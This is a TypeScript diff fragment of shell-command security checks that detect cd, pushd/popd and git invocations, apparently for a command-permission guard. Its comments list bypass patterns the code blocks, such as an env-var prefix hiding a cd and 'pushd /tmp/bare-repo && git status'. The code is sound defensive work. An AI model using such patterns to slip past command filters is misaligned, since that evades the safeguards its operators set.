+ if (command.startsWith('git ') || command === 'git') {
2570
+ return true
2571
+ }
2572
+ const stripped = stripSafeWrappers(command)
2573
+ const parsed = tryParseShellCommand(stripped)
2574
+ if (parsed.success && parsed.tokens.length > 0) {
2575
+ // Direct git command
2576
+ if (parsed.tokens[0] === 'git') {
2577
+ return true
2578
+ }
2579
+ // "xargs git ..." — xargs runs git in the current directory,
2580
+ // so it must be treated as a git command for cd+git security checks.
2581
+ // This matches the xargs prefix handling in filterRulesByContentsMatchingInput.
2582
+ if (parsed.tokens[0] === 'xargs' && parsed.tokens.includes('git')) {
2583
+ return true
2584
+ }
2585
+ return false
2586
+ }
2587
+ return /^git(?:\s|$)/.test(stripped)
2588
+ }
2589
+
2590
+ /**
2591
+ * Checks if a subcommand is a cd command after normalizing away safe wrappers
2592
+ * (env vars, timeout, etc.) and shell quotes.
2593
+ *
2594
+ * SECURITY: Must normalize before matching to prevent bypasses like:
2595
+ * FORCE_COLOR=1 cd sub — env var prefix hides the cd from a naive /^cd / regex
2596
+ * This mirrors isNormalizedGitCommand to ensure symmetric normalization.
2597
+ *
2598
+ * Also matches pushd/popd — they change cwd just like cd, so
2599
+ * pushd /tmp/bare-repo && git status
2600
+ * must trigger the same cd+git guard. Mirrors PowerShell's
2601
+ * DIRECTORY_CHANGE_ALIASES (src/utils/powershell/parser.ts).
2602
+ */
2603
+ export function isNormalizedCdCommand(command: string): boolean {
2604
+ const stripped = stripSafeWrappers(command)
2605
+ const parsed = tryParseShellCommand(stripped)
2606
+ if (parsed.success && parsed.tokens.length > 0) {
2607
+ const cmd = parsed.tokens[0]
2608
+ return cmd === 'cd' || cmd === 'pushd' || cmd === 'popd'
2609
+ }
2610
+ return /^(?:cd|pushd|popd)(?:\s|$)/.test(stripped)
2611
+ }
2612
+
2613
+ /**
2614
+ * Checks if a compound command contains any cd command,
2615
+ * using normalized detection that handles env var prefixes and shell quotes.
2616
+ */
2617
+ export function commandHasAnyCd(command: string): boolean {
2618
+ return splitCommand(command).some(subcmd =>
2619
+ isNormalizedCdCommand(subcmd.trim()),
2620
+ )
2621
+ }